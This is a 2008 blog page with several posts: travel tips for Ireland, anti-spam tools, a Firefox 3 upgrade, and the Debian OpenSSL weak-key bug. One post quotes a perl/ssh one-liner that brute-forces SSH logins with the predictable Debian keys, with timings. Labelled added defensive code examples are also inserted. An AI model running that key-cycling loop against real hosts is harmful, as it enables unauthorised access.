
Justin's Linklog Posts

Ireland tourism tips


So, Nelson is apparently contemplating a trip to Ireland, and was looking for tips. Since he’s not the first to ask, I thought I’d do some research among my friends on things to do and good places to stay and eat in our native country. Here’s the result.

First off — it’s worth noting that we’re all thirty-somethings, so backpacker stuff and heavy boozing is no longer on the menu. If you’re after that, though, head for Temple Bar in Dublin ;) This is mainly nice hotels, good food, and interesting things to look at.

To start with, I’d recommend driving as a means of getting around. Lots of the good stuff can’t be reached any other way, and the roads are generally pretty good nowadays (if a little narrow).

Prepare for rain.

Things to do: Connemara and Kerry are stunning; in my opinion, they’re unmissable, if you’re coming to Ireland in search of natural beauty. Clare and West Cork are pretty good too. Generally, the west coast is the place to go.

A friend recommends the Skelligs: ‘the best thing I’ve seen in Ireland. If it’s sunny. If it’s raining it sucks so don’t go.’ (I’ve never been — appalling, given that my great-grandfather wrote one of the definitive works on them, I need to fix that.)

Stuff to avoid: Dublin’s not too hot, unfortunately. Over-priced and hard to get around due to traffic. I mean, it’s quite nice, especially to live in, but as a tourist destination compared to other cities around the world I don’t quite get the attractiveness. Also, the south-east corner of the country, while full of nice friendly people, is exorbitantly expensive in my experience (even pricier than Dublin!), short on good stuff to see, and a bit of a washout, so I say skip it. (I have no idea why it’s so expensive, BTW. My theory is that it’s a traditional in-country holiday venue for Dubliners, and the Wexford inhabitants love to fleece us, so we got fleeced. Whatever.)

In general, I’d say the larger towns aren’t too exciting; stick to the country.

The Lonely Planet guide to Ireland, while frequently backpacker-oriented, is pretty good for non-backpacker stuff as well. If you’re driving around, it’s a good source of offbeat stuff to check out. I used it a lot when driving around Connemara last year. They also do a great book of hikes which I can recommend.

Next, places to stay… that friend again: ‘if you’re doing the Ring of Kerry, I strongly recommend diverting to Valentia and staying in Glanleam House (beautiful grub, beautiful gardens, cheap) and doing a day trip from there to the Skelligs.’

Temple House in Sligo also comes recommended: ‘a classical Georgian mansion set in an estate of 1,000 acres, overlooking a 13th century lakeside castle of the Knights Templar.’

There are lots of useless hotel/B&B sites in Google, making it hard to tell crap from quality. But these sites come recommended:

  • Ireland’s Blue Book – ‘luxury accommodation in Irish Country House Hotels, Manor Houses and Castles. Also listed are Ireland’s finest gourmet restaurants.’ This is high-end stuff, but it’s pretty reliable, as far as I can see.

  • Friendly Homes of Ireland – another friend says ‘aka crazy houses of Ireland — terrible webpage, but good accommodation (it’s also a more attractive guide). We stayed here and loved it.’

  • Hidden Ireland – ‘a unique collection of historic private houses which provide the very best and most stylish country house accommodation available in Ireland – great Irish hospitality at an affordable price. Our houses are not hotels and are very much more than ordinary guesthouses. They all offer a rare opportunity to experience the lifestyle of a bygone age – a special and fascinating alternative to conventional tourist accommodation.’

  • Irish Landmark Trust, if you’re interested in self-catering stays at heritage houses.

  • Georgina Campbell guidebooks are apparently quite good.

Finally, scams and rip-offs are few and far between, so that’s not something to worry about. Crappy service and mediocre food, however, are more likely to be the source of problems. At least you can now get decent espresso pretty much everywhere!

Hope that helps someone ;) Got tips of your own? Feel free to add comments!

links for 2008-06-04

links for 2008-06-01

links for 2008-05-30

TypePad AntiSpam

TypePad AntiSpam looks pretty cool. I’ve been trying it out for the past week on taint.org and underseacommunity.com, with no false positives or false negatives so far (although mind you I don’t get much spam, anyway, on those blogs, fortunately). Both are WordPress blogs — I set up Akismet, got a TypePad API key, and edited 3 lines in “wp-content/plugins/akismet/akismet.php”, and I was off.

However, here’s the key bit, the bit I’m most excited about — /svn/antispam/trunk/, particularly the GPL v2 LICENSE file — a fully open source backend!

The backend is a perl app built on Gearman and memcached. It uses DSpam instead of SpamAssassin, but hey, you can’t have everything ;) Nice, clean-looking perl code, too. Here’s hoping I get some tuits RSN to get this installed locally…

Daily links are back again

I’ve been talking to a few people recently who read taint.org (thanks!), but don’t follow the linkblog. This means they miss half of the good bits I post :( Also, there’s no way to comment on linkblog stuff, which is suboptimal.

To remedy this, I’m turning on daily links posting again, where I’ll post the day’s links, once a day, to the main blog.

If you’re not interested, feel free to subscribe to this ‘no-links’ feed URL instead of the default — it’s the main blog content, but with the links posts filtered out.

Upgrading to Firefox 3

Firefox 3 Release Candidate 1 was released earlier this month. I’ve upgraded.

I tried switching to it a couple of months back, but gave up, since my favourite extensions were AWOL. This time around though, they’re almost all present. Since Firefox is now basically an operating system in its own right, with upgrade pain all of its own, and a couple of people have asked, here’s what I needed to do to get from Firefox 2 to 3:

Make a list of my favoured extensions

Namely, from most important to least:

Create a new Mozilla profile

This allowed me to keep my Firefox 2.0 settings entirely intact, a key step. Install Firefox 3, and start it with “firefox -ProfileManager”, then create a new profile and start with that.

Get installing

The following extensions from the above list were available by now for Firefox 3, through addons.mozilla.org:

Firebug was slightly trickier, since you need the 1.2 beta version, specially designed for Firefox 3 support, available only from their ‘releases’ page.

However, Greasemonkey, SubmitToTab, and MozEx were still missing. :(

Greasemonkey, thankfully, wasn’t too hard to find — the latest nightly build from this directory does the trick.

MozEx seems dead — the Firefox 2 support was added in a development snapshot, and there’s no sign of Firefox 3 support. This was in danger of becoming a show-stopper, since I spend all day editing text in browser textareas in Trac, Bugzilla, and Wordpress — until I found It’s All Text!, which is even slightly prettier and simpler than MozEx. yay. The only thing to watch out for is that after setting the path to the editor command, I had to quit and restart the browser for it to recognise it as valid.

SubmitToTab is the only desirable plugin remaining. It looks like it won’t be making it any time soon, but I’m prepared to live without it. ;)

Also, while discussing this on Twitter, Vipul wondered if XPather was available — turns out that yes, v1.4 of XPather supports FF3. Looks cool too; I’ve installed it ;)

Copy bookmarks

Exit the browser, copy the “bookmarks.html” file from the old profile directory (~/.mozilla/firefox/jocfzbfo.jm in my case) to the new one (~/.mozilla/firefox/7bkf89ws.ff3), and restart it.

I didn’t bother copying cookies — I’m happy to log in again on all those sites. (I don’t like carrying too much baggage between upgrades…)

I also opened the Greasemonkey user scripts dir (~/.mozilla/firefox/jocfzbfo.jm/gm_scripts), clicked on each script there, and installed them that way to FF3. A little laborious, but nothing serious really.

Done!

End result: I’m using FF3, and it’s working quite nicely. Memory usage is consistently below 300MB, so far — I haven’t seen any bloating yet, which is a big improvement. I’m probably going to stick with it.

One thing: I did have to turn off the new image scaling effect, however — text font size modification also now scales images to match, which is very annoying (and jaggy). No Squint allows this quite neatly.

More details on the “GMail forwarding hole”

Those INSERT guys who’ve been talking about a GMail security hole allowing spammers to relay spam have released more previously-redacted details here. (thanks to the MailChannels blog for pointing that out.)

In essence, the attack works by allowing a spammer to set the “forward to” address in GMail to point at a target address, send a spam to the GMail account, then change the “forward to” address to the next target and repeat.

My response:

  1. it’d be trivial for Google to impose stringent rate limits on “forward to” address changes, and I’d be surprised if they haven’t already.

  2. ditto rate-limiting on the rate of forwarding messages for each GMail account.

  3. as they say in the paper — if Google required up-front confirmation of the target address before forwarding any mail, that would also cut this out neatly.

  4. It’s worth noting that while GMail’s outbound servers may be whitelisted by some recipient sites, others are treating them negatively — word on the anti-spam “street” is that GMail is becoming a festering pit of 419 scammers these days.

Ammado spam

Quoting an old job post: ‘ammado.com are a new online global community with headquarters in Dublin, Ireland. ammado are developing a fun interactive online entertainment platform catering for a huge global market, using the latest technologies.’

Well, using that and spam, it seems. Look what just arrived in my inbox:

  • X-Spam-Status: No, score=-8.0 required=5.0 tests=BAYES_50, EXTRA_MPART_TYPE, HABEAS_ACCREDITED_COI, HTML_MESSAGE, RP_MATCHES_RCVD,SPF_PASS shortcircuit=no autolearn=unavailable version=3.3.0-r650054
  • X-Spam-Relays-External: [ ip=89.101.128.81 rdns=mail.ammado.com helo=mail.ammado.com by=soman.fdntech.com ident= envfrom= intl=0 id=4856CBA51B8 auth= msa=0 ] [ ip=192.168.11.20 rdns= helo=amsrvmail001.ammado.local by=amsrvmail001.ammado.local ident= envfrom= intl=0 id= auth= msa=0 ]
  • From: Peter Conlon <pconlon/at/ammado.com>
  • Date: Mon, 26 May 2008 10:45:11 +0100
  • Subject: UNHCR asks the blogosphere for help

UNHCR and ammado, http://www.ammado.com are reaching out to the blogosphere in an effort to spread the word for this year’s World Refugee Day on June 20th and raise awareness of the situation of refugees all over the world!

This year, World Refugee Day is about protection, the heart and soul of UNHCR. With rising oil prices, decreasing food supplies, the adverse effects of climate change, the ongoing crisis in Darfur and a high number of unexpected natural disasters including those in Myanmar and China, the world’s refugees have never been more in need of protection.

Another day, another spam. They also spammed Donncha, Michele and Damien, so it sounds like they’re doing the rounds of the Irish blogosphere.

(Update: add Tom, Suzy, Alexia, squid at Limerick Blogger, and Grandad at Head Rambles to that list, too.)

However — the hit on the HABEAS_ACCREDITED_COI SpamAssassin rule means that Ammado are a member of the Habeas Accredited Confirmed-Opt-In program, meaning that they have undertaken a bond to only email people who signed up to receive their communications using “confirmed opt-in”. I have never had any dealings with Ammado, or opted in in any way to receive communication from them — let alone confirmed an opt-in. This is out-and-out unsolicited bulk email, or spam, so this may turn out to be an expensive mistake for Ammado.

If you also got spammed by a Habeas-accredited sender, send a complaint to complaints /at/ habeas.com. This is how the Habeas system works…

PS: This is a good illustration of how spam is not Unsolicited Commercial Email, but UBE — Unsolicited Bulk Email. Even though this is non-commercial, it’s still spam!

MailChannels’ Traffic Control now free-as-in-beer

I’m on the technical advisory board for MailChannels, a company who make a commercial traffic-shaping antispam product, Traffic Control. Basically, you put it in front of your real MTA, and it applies “the easy stuff” — greet-pause, early-talker disconnection, lookup against front-line DNSBLs, etc. — in a massively scalable, event-driven fashion, handling thousands of SMTP connections in a single process. By taking care of 80% of the bad stuff upfront, it takes a massive load off of your backend — and, key point, off your SpamAssassin setup. ;)

Until recently, the product was for-pay and (relatively) hard to get your hands on, but as of today, they’re making it available as a download at http://mailchannels.com/download/. Apparently: “it’s free for low-volume use, but high volume users will need a license key.”

Anyway, take a look, if you’re interested. I think it’s pretty cool. (And I’m not just saying that because I’m on their tech advisory board. ;)
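As an added example (not MailChannels’ code, and not from the original post), here are two of the “easy stuff” checks named above implemented in plain Python: a greet-pause with early-talker detection, and the construction of a front-line DNSBL lookup name. The banner hostname, the DNSBL zone and the sample client traffic are all constructed; nothing is resolved or contacted.

```python
import ipaddress
import select
import socket

# Constructed hostname for the SMTP banner (not a real server).
BANNER = b"220 mx.example.invalid ESMTP\r\n"


def early_talker(conn, pause_seconds):
    """Greet-pause: hold the 220 banner for pause_seconds before sending it.

    A legitimate SMTP client must wait for the banner before speaking; a client
    that sends bytes during the pause is an 'early talker', which is typical of
    spam engines that blast commands without reading replies. Returns True when
    the peer talked early (caller should disconnect), False when it waited.
    """
    readable, _, _ = select.select([conn], [], [], pause_seconds)
    if readable:
        # Peek so the bytes stay in the buffer; a zero-length read means the
        # peer simply hung up, which is not an early-talker event.
        if conn.recv(1, socket.MSG_PEEK):
            return True
    return False


def greet(conn, pause_seconds=2.0):
    """Apply the greet-pause check to one accepted connection.

    Returns 'rejected' (peer spoke before the banner and was disconnected with a
    5xx) or 'greeted' (banner sent, session may proceed to the real MTA).
    """
    if early_talker(conn, pause_seconds):
        conn.sendall(b"554 5.5.1 protocol error: data sent before banner\r\n")
        conn.close()
        return "rejected"
    conn.sendall(BANNER)
    return "greeted"


def dnsbl_query_name(ip, zone):
    """Build the name a DNSBL lookup queries: reversed IPv4 octets under the zone.

    An A-record answer for this name means the address is listed. The zone is a
    parameter because the concrete DNSBL is a policy choice, not part of this code.
    """
    addr = ipaddress.IPv4Address(ip)  # raises ValueError on non-IPv4 input
    return ".".join(reversed(addr.exploded.split("."))) + "." + zone


def simulate(client_talks_early, pause_seconds=0.2):
    """Drive greet() against a local socket pair standing in for a remote client.

    Returns (verdict, bytes the client received). A short pause keeps the demo
    fast; a production front end would use a pause of a few seconds.
    """
    server, client = socket.socketpair()
    client.settimeout(2.0)
    try:
        if client_talks_early:
            client.sendall(b"EHLO spam-cannon\r\n")  # speaks before the banner
        verdict = greet(server, pause_seconds)
        received = client.recv(1024)
        return verdict, received
    finally:
        client.close()
        server.close()


if __name__ == "__main__":
    print(simulate(True))   # early talker -> rejected with a 554
    print(simulate(False))  # polite client -> receives the 220 banner
    print(dnsbl_query_name("192.0.2.25", "dnsbl.example.invalid"))
```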

LWN.net on the Debian OpenSSL fiasco

Great article from LWN.net regarding the Debian OpenSSL vulnerability:

It is in the best interests of everyone, distributions, projects, and users, for changes made downstream to make their way back upstream. In order for that to work, there must be a commitment by downstream entities — typically distributions, but sometimes users — to push their changes upstream. By the same token, projects must actively encourage that kind of activity by helping patch proposals and proposers along. First and foremost, of course, it must be absolutely clear where such communications should take place.

Another recently reported security vulnerability also came about because of a lack of cooperation between the project and distributions. It is vital, especially for core system security packages like OpenSSH and OpenSSL, that upstream and downstream work very closely together. Any changes made in these packages need to be scrutinized carefully by the project team before being released as part of a distribution’s package. It is one thing to let some kind of ill-advised patch be made to a game or even an office application package that many use; SSH and SSL form the basis for many of the tools used to protect systems from attackers, so they need to be held to a higher standard.

+1.

The viability of remote SSH key cracking

Here’s some pretty scary figures from Craig Hughes on the viability of an SSH worm:

when doing this, connecting to localhost:

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'

4.63user 3.06system 0:19.54elapsed

ie about 50 per second

when connecting remotely over the internet (ping RTT is ~60ms):

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'

1.10user 0.60system 0:35.15elapsed

ie about 6 per second over the internet.

Logging of the failures on the server side looks like this:

May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1

ie it shows the connection attempt, but NOT the failure. It shows one connection attempt per 7 keys attempted.

So given that:

  1. RSA is the default if you don’t specify for ssh-keygen
  2. 99.99% of people use x86
  3. PID is sequential, and there’s almost certainly an uneven distribution in PIDs used by the keys out there in the wild

then:

Probably there’s about 10k RSA keys which are in some very large fraction of the (debian-generated) authorized_keys files out there. These can be attempted in about 1/2 an hour, remotely over the internet. You can hit the full 32k range of RSA keys in an hour and a half. Note that the time(1) output shows how little load this puts on the client machine — you could easily run against lots of target hosts in parallel; most of the time is spent waiting for TCP roundtrip latencies. Actually, given that, you could probably accelerate the attack substantially by parallelizing the attempts to an individual host so you have lots of packets in flight at any given time. You could probably easily get up towards the 50/s local number doing this, which brings time down to about 3-4 minutes for 10k keys, or 11 minutes for the full 32k keys.
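Since the server log above records only the connection attempt and not the failed key, the detectable signal on the defending side is the connection rate: one new TCP session per second or faster from one address, with climbing source ports and an identical client banner. The following is an added example (not Craig Hughes’ code, not from the original post) that parses lines in that exact log format and flags addresses that open a burst of connections within a short window. The sample lines are constructed in the format quoted above, with a second, benign address added for contrast.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the format of the sshd log quoted above.
SAMPLE_LOG = """\
May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:55:02 [sshd] SSH: Server;Ltype: Version;Remote: 192.0.2.10-41000;Protocol: 2.0;Client: OpenSSH_4.7p1
this line is not an sshd version record
"""

LINE_RE = re.compile(
    r"^(\w{3} +\d{1,2} \d\d:\d\d:\d\d) \[sshd\] SSH: Server;Ltype: Version;"
    r"Remote: ([\d.]+)-(\d+);Protocol: ([\d.]+);Client: (\S+)"
)


def parse_line(line, year=2008):
    """Parse one 'Ltype: Version' record; return a dict or None if it does not match.

    syslog timestamps carry no year, so the caller supplies one (assumed here).
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group(1)), "%Y %b %d %H:%M:%S")
    return {"time": ts, "ip": m.group(2), "port": int(m.group(3)),
            "client": m.group(5)}


def find_bursts(lines, threshold=5, window_s=30):
    """Flag remote addresses that opened >= threshold sessions inside any
    window_s-second span. Returns {ip: summary}. Sequential source ports and a
    single client banner in the summary support the 'one automated client'
    reading, since no authentication failure is logged per key."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    window = timedelta(seconds=window_s)
    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        best, best_span, start = 0, None, 0
        for end in range(len(recs)):            # sliding window over sorted times
            while recs[end]["time"] - recs[start]["time"] > window:
                start += 1
            if end - start + 1 > best:
                best = end - start + 1
                best_span = (recs[start]["time"], recs[end]["time"])
        if best >= threshold:
            alerts[ip] = {
                "connections": best,
                "first": best_span[0],
                "last": best_span[1],
                "clients": sorted({r["client"] for r in recs}),
                "ports_ascending": all(b["port"] > a["port"]
                                       for a, b in zip(recs, recs[1:])),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in find_bursts(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```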

Free SSL cert reissuance for Debian victims — unless you’re on RapidSSL

If you’ve been following the Debian OpenSSL pRNG security debacle, you may have noticed that there’s a painful problem for people who’ve used a Debian or Ubuntu system in the process of buying a commercial SSL key — they are in a situation where those commercially-purchased keys need to be regenerated.

(When an SSL key is obtained from a commercial Certificate Authority, you first have to generate a Certificate Signing Request on your own machine, then send that to the CA, who extracts its contents and applies a signature to produce a valid CA-issued certificate.)

Things are looking up for these victims, though — some smart cookie at Debian came up with these instructions:

SSL Certificate Reissuance

If you paid good money to have a vulnerable key signed by a Certificate Authority (CA), chances are your CA can re-issue a certificate for free, provided all information in the CSR is identical to the original CSR. Create a new key with a non-vulnerable OpenSSL installation, re-create the CSR with the same information as your original (vulnerable) key’s CSR, and submit it to your CA according to their reissuance policy:

  • GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)
  • Thawte: Here (Available throughout the lifetime of the certificate.)
  • VeriSign: Unknown
  • GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process “re-keying”, while they call the act of sending you the same signed certificate as your original order a “reissuance”.)
  • ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.
  • CAcert: This is a cost free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment the certificate generation will take some time, as it seems that many users are re-issuing their certificates.
  • Digicert: Login to Your account to re-issue (free).

This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don’t really. Their low-cost RapidSSL certs require that you buy ‘reissue insurance’ for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :( Wiki updated.

Update: RapidSSL certs are, indeed, now free to reissue! Use this URL and click through on the “buy” link for reissuance insurance — the price quoted will be $0. Wiki re-updated ;). (thanks to ServerTastic for the tip.)

Serious Debian/Ubuntu openssl/openssh bug found

via Reddit, this Debian Security announcement:

‘Luciano Bello discovered that the random number generator in Debian’s openssl package is predictable. This is caused by an incorrect Debian-specific change to the openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.

It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems (ie since 2006! –jm) is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.’

and, of course, here’s the Ubuntu Security Notice for the hole:

Who is affected

Systems which are running any of the following releases:

  • Ubuntu 7.04 (Feisty)
  • Ubuntu 7.10 (Gutsy)
  • Ubuntu 8.04 LTS (Hardy)
  • Ubuntu “Intrepid Ibex” (development): libssl <= 0.9.8g-8
  • Debian 4.0 (etch) (see corresponding Debian security advisory)

and have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate. All OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied. This includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.

It was apparently caused by this incorrect “fix” applied by the Debian maintainers to their package. One wonders why that fix never made it upstream.

Bad news….

Update: Ben Laurie tears into Debian for this:

What can we learn from this? Firstly, vendors should not be fixing problems (or, really, anything) in open source packages by patching them locally – they should contribute their patches upstream to the package maintainers. Had Debian done this in this case, we (the OpenSSL Team) would have fallen about laughing, and once we had got our breath back, told them what a terrible idea this was. But no, it seems that every vendor wants to “add value” by getting in between the user of the software and its author.

+1!

For what it’s worth, we in Apache SpamAssassin work closely with our Debian packaging team, tracking the debbugs traffic for the spamassassin package, and one of the Debian packagers is even on the SpamAssassin PMC. So that’s one way to reduce the risk of upstream-vs-package fork bugs like this, since we’d have spotted that change going in, and nixed it before it caused this failure.

Here’s a question: should the OpenSSL dev team have monitored the bug traffic for Debian and the other packagers? Do upstream developers have a duty to monitor downstream changes too?

This comment puts it a little strongly, but is generally on the money in this regard:

the important part for OpenSSL is to find a way to escape the blame for their fuck-up. They failed to publish the correct contact address for such important questions regarding OpenSSL. Branden (another commenter –jm) noted that the mail address mentioned by Ben is not documented anywhere. It is OpenSSL’s responsibility that they allowed the misuse of openssl-dev for offtopic questions and then silently moved the dev stuff to a secret other list nobody outside OpenSSL knew about.

I’m sure Debian is willing to take their fair share of the blame if OpenSSL finally admits that their mistake played a major role here as well. After all the Debian maintainer might have misrepresented the nature of his plans, but he gave warning signs and said he was unsure. But as it appears now all the people who might have noticed secretly left openssl-dev, the documented place for that kind of questions. This is hardly the fault of the maintainer.

Update 2: this Reddit comment explains the hole in good detail:

Valgrind was warning about uninitialized data in the buffer passed into ssleay_rand_bytes, which was causing all kinds of problems using Valgrind. Now, instead of just fixing that one use, for some reason, the Debian maintainers decided to also comment out the entropy mixed in from the buffer passed into ssleay_rand_add. This is the very data that is supposed to be used to seed the random number generator; this is the actual data that is being used to provide real randomness as a seed for the pseudo-random number generator. This means that pretty much all data generated by the random number generator from that point forward is trivially predictable. I have no idea why this line was commented out; perhaps someone, somewhere, was calling it with uninitialized data, though all of the uses I’ve found were with initialized data taken from an appropriate entropy pool.

So, any data generated by the pseudo-random number generator since this patch should be considered suspect. This includes any private keys generated using OpenSSH on affected Debian systems. It also includes the symmetric keys that are actually used for the bulk of the encryption.

A pretty major fuck-up, all told.

Update 3: Here’s a how-to page on wiki.debian.org put together by the folks from the #debian IRC channel. It has how-to information on testing your keys for vulnerability using a script called ‘dowkd.pl’, details of exactly what packages and keys are vulnerable, and instructions on how to regenerate keys in each of the (many) affected apps.

It notes this about Apache2 SSL keys:

According to folks in #debian-security, if you have generated an SSL key (normally the step just prior to generating the CSR, and then sending it off to your SSL certificate provider), then the certificate should be considered vulnerable.

So, bad news — SSL keys will need to be regenerated. Add ‘costly’ to the list of downsides. (Yet another update: this hasn’t turned out quite that badly after all — many CAs are now offering free reissuance of affected certs.)

Looking at ‘dowkd.pl’, it gets even worse for ssh users. It appears the OpenSSH packages on affected Debian systems could only generate 1 of only 262148 distinct keypairs. Obviously, this is trivial to brute-force. With a little precomputation (which would only take 14 hours on a single desktop!), an attacker can generate all of those keypairs, and write a pretty competent SSH worm. :(

Update: voila, precomputed keypairs, and figures on the viability of remote brute-forcing the keyspace in 11 minutes.
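The practical check ‘dowkd.pl’ performs is a lookup of each key’s fingerprint against a list of the known-weak fingerprints. As an added example (not dowkd.pl, not Debian’s code, and not from the original post), here is that check in Python over an authorized_keys file: it decodes each OpenSSH public key blob, computes the MD5 fingerprint in the colon-separated form ssh-keygen printed at the time, and reports lines whose fingerprint is in the blocklist. The keys and the blocklist are constructed with toy moduli; in real use the set of fingerprints comes from the published weak-key list.

```python
import base64
import hashlib
import struct


def _ssh_string(b):
    """Length-prefixed string as used in OpenSSH key blobs."""
    return struct.pack(">I", len(b)) + b


def _ssh_mpint(n):
    """SSH mpint: minimal big-endian bytes, with a 0x00 pad if the high bit is set."""
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if b[0] & 0x80:
        b = b"\x00" + b
    return _ssh_string(b)


def make_rsa_pubkey_line(e, n, comment):
    """Build an authorized_keys line (ssh-rsa, e, n). Used only to construct
    sample data here; the moduli below are toy values, not key material."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    return "ssh-rsa " + base64.b64encode(blob).decode() + " " + comment


def fingerprint(line):
    """MD5 fingerprint (aa:bb:...) of the key blob in one public-key line.
    Raises ValueError for anything that is not a well-formed ssh-rsa/ssh-dss key."""
    parts = line.split()
    if len(parts) < 2 or parts[0] not in ("ssh-rsa", "ssh-dss"):
        raise ValueError("not an OpenSSH public key line")
    try:
        blob = base64.b64decode(parts[1], validate=True)
    except ValueError as exc:               # binascii.Error is a ValueError
        raise ValueError("bad base64 in key blob") from exc
    if len(blob) < 4:
        raise ValueError("truncated key blob")
    tlen = struct.unpack(">I", blob[:4])[0]
    if blob[4:4 + tlen] != parts[0].encode():   # blob must repeat the key type
        raise ValueError("key type mismatch between prefix and blob")
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, 32, 2))


def check_authorized_keys(text, blocklist):
    """Scan authorized_keys text. Returns (weak, unparsable): weak is a list of
    (line number, fingerprint) hits; unparsable lists line numbers that could
    not be decoded and so deserve a manual look rather than silent acceptance.
    Option prefixes (e.g. no-pty) are handled when they contain no whitespace."""
    weak, unparsable = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t.startswith("ssh-")), None)
        if idx is None:
            unparsable.append(lineno)
            continue
        try:
            fp = fingerprint(" ".join(tokens[idx:]))
        except ValueError:
            unparsable.append(lineno)
            continue
        if fp in blocklist:
            weak.append((lineno, fp))
    return weak, unparsable


# Constructed sample data (toy moduli, not real keys).
WEAK_KEY_LINE = make_rsa_pubkey_line(65537, 0xC0FFEE0DDBA11, "weak@etch")
GOOD_KEY_LINE = make_rsa_pubkey_line(65537, 0xFACEB00C1234567, "fresh@laptop")
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed authorized_keys for the demo",
    WEAK_KEY_LINE,
    "no-pty " + GOOD_KEY_LINE,
    "ssh-rsa not*base64* broken@host",
    GOOD_KEY_LINE,
])
# Stands in for the published weak-fingerprint list; constructed from the sample.
WEAK_FINGERPRINTS = {fingerprint(WEAK_KEY_LINE)}


if __name__ == "__main__":
    print(check_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS))
```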

Full-text RSS bookmarklet

This site offers a nifty utility for dealing with those annoying sites which offer only partial text content in their RSS and Atom feeds.

